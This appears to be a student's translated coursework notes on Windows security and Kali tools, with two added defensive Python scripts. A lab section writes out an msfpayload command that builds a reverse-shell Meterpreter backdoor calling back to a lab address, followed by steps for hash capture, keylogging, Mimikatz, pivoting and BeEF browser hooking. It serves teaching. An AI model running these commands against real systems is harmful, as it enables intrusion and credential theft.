2017-2018-2 20179223 "Network Attack and Defense Technology" Week 7 Homework

learning material content

1. Windows operating system framework

1. Development and current situation of Windows operating system

Windows occupies a very high market share in desktop operating systems, and Windows XP system still has a large number of users in China

2. Basic structure of Windows operating system

(1) The basic module of the Windows operating system kernel

+Windows executable: the upper interface of the Windows kernel core file ntoskrnl.exe

+Windows kernel body: function implementation and hardware architecture support code in the Windows kernel core file ntoskrnl.exe to realize the underlying operating system functions

+ Device drivers: including hardware device drivers that map user I/O operations to specific hardware device I/O requests, as well as file system and network device drivers.

+Hardware abstraction layer: hal.dll file, the underlying code used to shield the differences between Windows kernel and platform hardware.

+Windows window and GUI interface kernel implementation code: win32k.sys file

(2) The code module of Windows operating system in user mode

+ System support process: system built-in service process automatically started when Windows is started

+ Environment subsystem service process: a service process that provides support for the operating system operating environment

+Service process: a series of system and network services started through the service management mechanism of windows

+User application software: all kinds of user application software executed in user mode

+Core subsystem DLLs: dynamic link library files such as kernel32.dll, user32.dll, gdi32.dll and advapi32.dll. They are the interaction interface between user-mode service processes and application software on one side and the operating system kernel on the other: each system API function called by a user-mode program is mapped to one or more corresponding Windows internal system service calls.

(3) Core mechanism

+Windows process and thread management mechanism

+Windows memory management mechanism

+Windows file management mechanism

+Windows registry management mechanism

+Windows network mechanism

① Network card hardware device driver, located at the OSI physical layer
② NDIS library and miniport driver, located at the OSI link layer
③ TDI transport layer and network protocol driver, located at the OSI network and transport layers
④ Network API DLL and TDI client, corresponding to the OSI session and presentation layers
⑤ Network application and service process, corresponding to the OSI application layer

2. Security Architecture and Mechanism of Windows Operating System

1. Windows Security Architecture

The Windows operating system implements its basic object security model on the reference monitor model. Every subject in the system accesses objects only through the reference monitor as an intermediary; the reference monitor grants or denies access according to the security access control policy, and it also generates the audit log records for all accesses.

The core of the basic Windows security mechanism is the SRM (Security Reference Monitor) located in the kernel and the LSASS security service located in user mode. Together with services such as Winlogon/Netlogon and Eventlog, they implement the identity authentication mechanism for subjects (users), the access control mechanism for all resource objects, and the security audit mechanism for accesses.

2. Windows authentication mechanism

In the Windows operating system, the concept of a security principal covers all entity objects that request access to system resources, including users, user groups and computers. Each security principal is identified by a SID (security identifier) that is globally unique in both time and space. The fundamental role of account permissions is to limit the access that programs running under these accounts have to system resource objects.

Windows has a number of built-in accounts, such as the local Administrator account with the highest privileges, the SYSTEM/LocalSystem account under which system processes run automatically, the Guest anonymous-access user with relatively few privileges, the IUSR_Machinename anonymous network access account of the IIS service, and so on. In the eyes of attackers, the local Administrator and SYSTEM accounts have the highest privileges and are the ultimate targets of their attacks.

The built-in user groups of Windows include Administrators, the highest-privileged local user group; the Account/Backup/Server/Print Operators and similar operator groups, each holding one particular slice of system authority; the Network Service and Local Service groups that accommodate service accounts; the Users group that contains all user accounts; and others. Windows user account passwords are stored encrypted in the SAM or in Active Directory (AD). Local user account password information is hashed with an irreversible 128-bit random key and stored in the SAM file, located at %systemroot%\system32\config\sam on the file system, with a copy under HKEY_LOCAL_MACHINE\SAM in the registry.

The Windows domain account password information is stored in the Active Directory AD of the domain controller. The encryption method is the same as that of the stand-alone platform. The storage file system location is the %systemroot%\ntds\ntds.dit path of the domain controller.

Windows supports local authentication and network authentication, respectively, to verify the legitimacy of the main subjects who log in to the local system and access the remote network. The network authentication process is led by the Netlogon module of the LSASS service.

The Winlogon process, the GINA graphical login window and the LSASS service cooperate to complete the local authentication process.

3. Windows authorization and access control mechanism

The Windows authorization and access control mechanism is based on the reference monitor model and is implemented by the SRM module in the kernel and the LSASS service in user mode. On Windows server operating systems, users can run the built-in whoami command to view the access token information of the current user. Windows abstracts every resource to be protected into an object; the concrete types include files, directories, registry keys, kernel objects, synchronization objects, private objects, pipes, memory, communication interfaces, and so on. Each object is associated with an SD (security descriptor) consisting of the following attributes:

+Owner SID

+Group SID

+DACL discretionary access control list

+SACL System Audit Access Control List
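The four parts of a security descriptor listed above are exactly what Windows exposes in its SDDL string form (O: owner, G: group, D: DACL, S: SACL). The parser below is an added example, not part of the course notes or of Windows itself: it splits an SDDL string into those four parts, expands each ACE into its type, flags, rights and trustee, resolves the standard two-letter SID aliases (BA, SY, WD, ...) and the well-known RIDs 500/501, and reports which trustees hold full control. The sample descriptor is constructed for the demo; the alias and rights tables are the standard Windows SDDL abbreviations.

```python
"""Parse an SDDL security-descriptor string into owner, group, DACL and SACL.

Added example (not from the course notes): alias tables are standard Windows
SDDL abbreviations; SAMPLE_SDDL is a constructed descriptor.
"""
import re

# Two-letter SDDL aliases for well-known SIDs (subset)
WELL_KNOWN_SID = {
    "BA": "BUILTIN\\Administrators", "BU": "BUILTIN\\Users",
    "SY": "NT AUTHORITY\\SYSTEM", "WD": "Everyone",
    "AU": "NT AUTHORITY\\Authenticated Users",
}
# Well-known RIDs at the end of a domain/local S-1-5-21-... SID
RID_NAMES = {500: "Administrator", 501: "Guest", 512: "Domain Admins", 513: "Domain Users"}
# Rights abbreviations inside an ACE (WD here means WRITE_DAC, unlike the SID alias WD)
RIGHTS = {
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
    "FA": "FILE_ALL_ACCESS", "FR": "FILE_GENERIC_READ", "FW": "FILE_GENERIC_WRITE",
    "FX": "FILE_GENERIC_EXECUTE", "WO": "WRITE_OWNER", "WD": "WRITE_DAC",
    "RC": "READ_CONTROL", "SD": "DELETE",
}
ACE_TYPE = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "AU": "SYSTEM_AUDIT"}
SECTION_RE = re.compile(r"(O|G|D|S):")

# Constructed sample: Administrators and SYSTEM have full control, Users have a
# read/execute mask, and every access by Everyone is audited (success and failure).
SAMPLE_SDDL = "O:BAG:SYD:P(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;0x1200a9;;;BU)S:(AU;SAFA;FA;;;WD)"


def parse_sid(token):
    """Resolve an alias or annotate a full SID whose RID is well known."""
    if token in WELL_KNOWN_SID:
        return WELL_KNOWN_SID[token]
    if token.startswith("S-1-5-21-"):
        rid = int(token.rsplit("-", 1)[1])
        if rid in RID_NAMES:
            return f"{token} [{RID_NAMES[rid]}]"
    return token


def parse_rights(field):
    """Rights are either a hex access mask or a run of two-letter codes."""
    if field.startswith("0x"):
        return [f"MASK:{field.lower()}"]
    return [RIGHTS.get(field[i:i + 2], field[i:i + 2]) for i in range(0, len(field), 2)]


def parse_ace(ace):
    """ACE layout: type;flags;rights;object_guid;inherit_object_guid;sid."""
    fields = ace.split(";")
    if len(fields) != 6:
        raise ValueError(f"malformed ACE: {ace}")
    typ, flags, rights, _obj, _inh, sid = fields
    return {
        "type": ACE_TYPE.get(typ, typ),
        "flags": [flags[i:i + 2] for i in range(0, len(flags), 2)],  # e.g. OI CI, SA FA
        "rights": parse_rights(rights),
        "trustee": parse_sid(sid),
    }


def parse_sddl(sddl):
    """Split on the O:/G:/D:/S: markers; ACE fields never contain ':' so this is safe."""
    parts = SECTION_RE.split(sddl)
    if parts[0] != "":
        raise ValueError("SDDL must start with a section marker")
    desc = {"owner": None, "group": None, "dacl": [], "sacl": [], "dacl_control": ""}
    for marker, body in zip(parts[1::2], parts[2::2]):
        if marker == "O":
            desc["owner"] = parse_sid(body)
        elif marker == "G":
            desc["group"] = parse_sid(body)
        else:
            aces = [parse_ace(a) for a in re.findall(r"\(([^)]*)\)", body)]
            if marker == "D":
                desc["dacl"] = aces
                desc["dacl_control"] = body.split("(", 1)[0]  # e.g. "P" = protected
            else:
                desc["sacl"] = aces
    return desc


def full_control_trustees(desc):
    """Trustees explicitly allowed FILE_ALL_ACCESS or GENERIC_ALL in the DACL."""
    return [a["trustee"] for a in desc["dacl"]
            if a["type"] == "ACCESS_ALLOWED"
            and ({"FILE_ALL_ACCESS", "GENERIC_ALL"} & set(a["rights"]))]


if __name__ == "__main__":
    d = parse_sddl(SAMPLE_SDDL)
    print("owner:", d["owner"], "| group:", d["group"], "| DACL control:", d["dacl_control"])
    for ace in d["dacl"] + d["sacl"]:
        print(ace)
    print("full control:", full_control_trustees(d))
```

On a real system the same string comes from `(Get-Acl C:\path).Sddl` in PowerShell; feeding it to `parse_sddl` is a quick way to review who owns an object, who holds full control, and whether a SACL exists at all (an empty SACL means accesses to that object will not show up in the audit log no matter what the audit policy says).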

4. Windows security audit mechanism

The system audit policy is defined by the system administrator in the local security policy to determine which events are logged by the system.

5. Other security mechanisms of Windows

Identity authentication, authorization and access control, and security auditing are the three basic security functions. The three most critical security measures for protecting the safe and stable operation of a Windows system are the firewall, automatic patch updates and virus protection. Beyond the Security Center, Windows security features also include the IPSec encryption and authentication mechanism, the EFS encrypted file system, the Windows file protection mechanism, and the privacy protection and browsing security mechanisms provided by the bundled IE browser.

3. Windows remote security attack and defense technology

+ Remote password guessing and cracking attacks

+ Attack Windows Network Services

+ Attack Windows clients and users

1. Security vulnerability life cycle of Windows system

The essential core of system security lies in the offensive and defensive game and competition among security vulnerabilities, penetration attacks and security detection and defense mechanisms.

+Windows security vulnerability discovery, exploitation and patching process

+ Security Vulnerability Public Disclosure Repository

+ Penetration testing attack process for specific targets

①Vulnerability scanning test
②Find penetration code for discovered vulnerabilities
③Perform penetration test

Using Metasploit to carry out penetration testing: Metasploit adopts an extensible model made up of a development framework and modules. The Metasploit Framework (MSF) library, written in Ruby, is the basic core of the whole software and provides the platform on which penetration testing components are developed and tested. The modules are the code that actually performs the attacks: the Exploits module that exploits security vulnerabilities, the Auxiliary module that performs scanning, enumeration and other auxiliary tasks, the Payloads module containing the shellcode that is implanted and run on the target system, the Encoders module that encodes the payload to avoid detection, and the Nops module that pads the payload. Metasploit provides several user interfaces, including the Console interactive terminal, command-line programs, a Web interface and a GUI; it also provides API interfaces and plug-in support so that third parties can develop extension modules on top of MSF, such as automated penetration testing routines.

2. Windows remote password guessing and cracking attacks

+ Remote password guessing

+ Remote password exchange communication eavesdropping and cracking

+Remote password guessing and cracking prevention measures

3. Windows network service remote penetration attack

Windows operating systems open ports 135 (TCP), 137 (UDP), 139 (TCP) and 445 (TCP) by default. The corresponding network services are the MSRPC remote procedure call service, the NetBIOS network basic input/output system service, and the SMB file and printer sharing service.

+ Well-known vulnerabilities and attacks against NetBIOS network services

+ Well-known vulnerabilities and attacks against SMB network services

+ Well-known vulnerabilities and attacks against MSRPC network services

+ Remote penetration attack against Microsoft Network Services on Windows systems

+ Remote penetration attacks against third-party network services on Windows systems

+Prevention measures for remote penetration attack of network services

4. Windows local security attack and defense technology

1. Windows local privilege escalation

Ultimate privilege: Administrator or Local System account. The attack technique of attempting to gain privileged accounts from restricted user rights is also known as privilege escalation.

2. Windows sensitive information theft

+Windows system password ciphertext extraction technology

+Windows system password cracking technology

+ User sensitive data theft

+ Local sensitive information theft prevention measures

3. Windows track covering

+ Turn off the audit function

+ Clean up the event log

+ Preventive measures against track covering
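The audit mechanism described earlier (the administrator's audit policy decides which events are logged), the remote password guessing attacks, and the two track-covering steps just listed all leave traces in the Windows Security log. The script below is an added example, not part of the course notes or of any Microsoft tool: it runs two detections over a set of constructed event records, one for repeated failed network logons from a single source followed by a success, and one for the events that Windows itself writes when the audit policy is changed (event ID 4719) or the audit log is cleared (event ID 1102). The event IDs and the LogonType 3 value are the standard Windows Security-log definitions; the records, accounts and RFC 1918 addresses are constructed for the demo.

```python
"""Detect password guessing and audit-trail tampering in Windows Security-log events.

Added example (not from the course notes): event IDs are the standard Windows
Security-log IDs; EVENTS is a constructed sample.
"""
from collections import Counter

FAILED_LOGON, SUCCESS_LOGON = 4625, 4624      # An account failed / succeeded to log on
AUDIT_POLICY_CHANGED, AUDIT_LOG_CLEARED = 4719, 1102
NETWORK_LOGON = 3                             # LogonType 3: over the network (SMB, RPC, ...)

# Constructed records: (timestamp, event id, target account, source address, logon type).
# Twelve failures in twelve seconds against "administrator" from one host, then a success.
EVENTS = [(f"2018-04-09 10:00:{i:02d}", FAILED_LOGON, "administrator", "192.168.129.50", 3)
          for i in range(12)]
EVENTS += [
    ("2018-04-09 10:00:13", SUCCESS_LOGON, "administrator", "192.168.129.50", 3),  # guess succeeded
    ("2018-04-09 10:02:00", FAILED_LOGON, "bob", "192.168.129.10", 2),            # one local typo
    ("2018-04-09 10:05:00", SUCCESS_LOGON, "bob", "192.168.129.10", 2),
    ("2018-04-09 10:07:30", AUDIT_POLICY_CHANGED, "administrator", "-", 0),       # "turn off auditing"
    ("2018-04-09 10:08:00", AUDIT_LOG_CLEARED, "administrator", "-", 0),          # "clean up event log"
]


def detect_password_guessing(events, threshold=10):
    """Sources with at least `threshold` failed network logons, and the first
    network logon success from that source once the threshold was reached."""
    failures = Counter()
    success_after = {}
    for ts, eid, account, src, ltype in events:
        if ltype != NETWORK_LOGON:
            continue  # local/interactive failures are handled by a different rule
        if eid == FAILED_LOGON:
            failures[src] += 1
        elif eid == SUCCESS_LOGON and failures[src] >= threshold and src not in success_after:
            success_after[src] = (ts, account)
    return {src: {"failures": n, "success_after": success_after.get(src)}
            for src, n in failures.items() if n >= threshold}


def detect_audit_tampering(events):
    """1102 is written as the first entry of the freshly cleared log, and 4719 is
    written when the audit policy changes, so both survive the attacker's cleanup."""
    labels = {AUDIT_LOG_CLEARED: "audit log cleared", AUDIT_POLICY_CHANGED: "audit policy changed"}
    return [(ts, labels[eid], account) for ts, eid, account, _src, _lt in events if eid in labels]


if __name__ == "__main__":
    for src, info in detect_password_guessing(EVENTS).items():
        print(f"{src}: {info['failures']} failed network logons, success after: {info['success_after']}")
    for ts, what, who in detect_audit_tampering(EVENTS):
        print(f"{ts}: {what} by {who}")
```

Because an attacker who has gained Administrator can clear the local log, the preventive measure that actually works is forwarding Security events to a separate collector as they are written; the tampering rule then fires on the copy the attacker cannot reach.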

4. Windows remote control and backdoor programs

+ Command line remote control tool

+ Graphical remote control tool

+ Preventive measures against backdoors

Reference
http://blog.sina.com.cn/s/blog_acdeaa0901017irl.html

video content learning

Since my own computer was used for maintenance, I borrowed someone else's computer to do this experiment.

KaliSecurity - Vulnerability Retrieval and Exploitation

Vulnerability Detection and Exploitation Tools

1. searchsploit, a vulnerability retrieval tool. This project was started by Offensive Security and is based on the official vulnerability database source of Exploit Database. It can search for vulnerability-related information directly from the terminal, such as vulnerability profiles and vulnerability verification/exploitation scripts.

Listing all files: all vulnerabilities and the corresponding file paths are listed.

The paths are relative to the directory /usr/share/exploitdb/platforms/; enter the relative path of the file corresponding to the vulnerability.

Command used: cat php/webapps/6.php

Searching for remote vulnerabilities in the IIS service on Windows: root@localhost:~# searchsploit windows iis remote

2. pattern create

This command can be used when investigating a buffer overflow. For example, pattern create 1000 a can output 1000 a.

3. tie

A network vulnerability scanning tool that opens a listening port on an IP address. Once a vulnerable host reaches it through this port, the host is attacked and a shellcode is implanted; the tool waits for the target to visit.

4.Termineter is designed to evaluate the security of smart meters, Python Smart Meter Testing Framework.

Summary of Metasploit Basics of Vulnerability Exploitation

Metasploit is often used in penetration testing and contains many tools that form a complete attack framework.

To use Metasploit in Kali, you need to start the PostgreSQL database service and the metasploit service first; only then can you fully use the msf database to query exploits and records.

service postgresql start
service metasploit start

If you don't want to manually start the service every time you boot, you can configure it to start with the system.

update-rc.d postgresql enable
update-rc.d metasploit enable

2. Path introduction

The path to msf in Kali is /usr/share/metasploit-framework

+Auxiliary: auxiliary module

+encoders: the encoders used by the msfencode tool; you can list them with msfencode -l

+exploits: the attack modules. The ms08_067_netapi module mentioned in every article introducing msf lives in this directory.

+payloads: Listed are the attack payloads, that is, the code that is executed after the attack is successful. For example, windows/meterpreter/reverse_tcp that we often set is under this folder.

+post: post-exploitation stage modules, attack code that can be used once a meterpreter shell has been obtained. For example, the commonly used hashdump and arp_scanner are here.

3. Basic commands

msfpayload: used to generate payload or shellcode

When searching, you can use the command msfpayload -l | grep "windows". The -o option lists the parameters required by a payload.

msfencode: the encoder in msf. Early on it was used to bypass AV; now it is commonly used to encode the output of msfpayload to avoid the bad characters of an exploit.

msfconsole: The most commonly used command to open metasploit's console.

4. Test example: find vulnerabilities, search for exploits

In the earlier stage, the scan showed that the vsftp service on the target's port 21 is version 2.3.4. Use msfconsole to open the command-line version of msf, and search for vulnerabilities with the search statement.

No vulnerabilities were found in this version.

KaliSecurity - Introduction to Meterpreter for Vulnerability Exploitation

meterpreter is an extension module in the Metasploit framework. It is used as an attack payload: after the overflow succeeds, the payload returns a control channel to us, so using it as the payload gives us a meterpreter shell on the target system.

As a post-penetration module, meterpreter has many variants, and its commands consist of core commands and extension library commands, which greatly enriches the attack methods. It has many useful functions, such as adding a user, hiding things, opening a shell, obtaining user passwords, uploading and downloading files on the remote host, running cmd.exe, capturing the screen, obtaining remote control, capturing keystrokes, clearing applications, displaying the remote host's system information, and displaying the remote host's network interfaces and IP addresses.

Common commands:

background: put the current session in the background

load/use: load the module

interact: switch to a channel

migrate: migrate the session into another process

run: execute an existing module. One thing worth pointing out here: press Tab twice after typing run, and all existing scripts are listed.

resource: execute an existing rc script

The commonly used meterpreter payload type is payload/windows/meterpreter/reverse_tcp

Attack steps:

1. Generate Meterpreter backdoor: command:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.129.200 LPORT=2333 R | msfencode -t exe -c 5 > /root/door1.exe

The current IP address of kali is: 192.168.129.200

2. Open MSF, enable the listener by selecting exploit/multi/handler, and make sure it is running

3. Execute door.exe on the target machine
4. View executable commands through the help command
5. Use of common commands, including system information, capture screenshots and capture HASH, etc.
6. Directory browsing
7. Keyboard monitoring
8. Extension tools, enter help after load/use, you can see the description of the commands of this module
9. Mimikatz among the extension tools grabs the local password in plaintext

KaliSecurity - Metasploit Post-Exploitation Penetration Testing

After a certain level of privilege has been obtained on the pivot host, the next step is to actively expand to the other intranet hosts, obtain information about the specified targets, and probe for system vulnerabilities. With the help of the Meterpreter backdoor that msf has already obtained, this series of operations becomes easier.

1. View the current network card and network segment information. ifconfig

2. Add routing table

run autoroute -s 10.0.0.1

You can use the modules in msf to attack or scan across network segments. Quickly added via script autoroute.

3. Open socket proxy, create a socks proxy by using auxiliary/server/socks4a module, which can be used for browser, sqlmap, nmap. You can access intranet computers through a proxy.

4. You can freely switch to the session through background and session -i.

5. Enter run to see many commands that can be done on the meterpreter.

6. You can see the post penetration test module through run post/

7. Get intranet information: run arp_scanner -h

8. You can also upload files and do port forwarding for subsequent testing.

BeeF Summary of Vulnerability Exploitation

Exploiting XSS vulnerabilities needs strong framework support, such as an online XSS platform. Under Kali, BeEF is a tool that is not inferior to such a platform. BeEF is the abbreviation of Browser Exploitation Framework, a penetration testing tool focused on the browser. Official website: http://beefproject.com/

1. Start BeEF from the command line with beef-xss. The browser then automatically opens this page: http://127.0.0.1:3000/ui/authentication. Log in with the default user name beef and default password beef:

On the left: the hooked browsers

2. Suppose the host under test requests to http://192.168.129.200:3000/demos/basic.html due to XSS vulnerability

Access is denied, and then there is no success. Also very helpless.

A new option appears in the online browsers on the left, and the Current Browser includes the browser name, version, operating system version, etc.

3. The hook lasts until the test page is closed. During this period the browser is effectively under control and can receive attack commands. In the Commands module we can complete many tasks:

Among them, the four colors mean:

+ This attack module is available and very stealthy

+ This attack module is available, but it is poorly concealed

+ The availability of this attack module remains to be verified

+ This attack module is not available

Select the Raw JavaScript module under Misc as a test case

Execute it and view the returned result; if it succeeds, the result is displayed

4. Proxy function

Select the target host, right-click, and select Use as Proxy in the menu; then edit and send the content you want to send in the Forge Request in the Rider tab.

Origin http://43.154.161.224:23101/article/api/json?id=324758018&siteId=291194637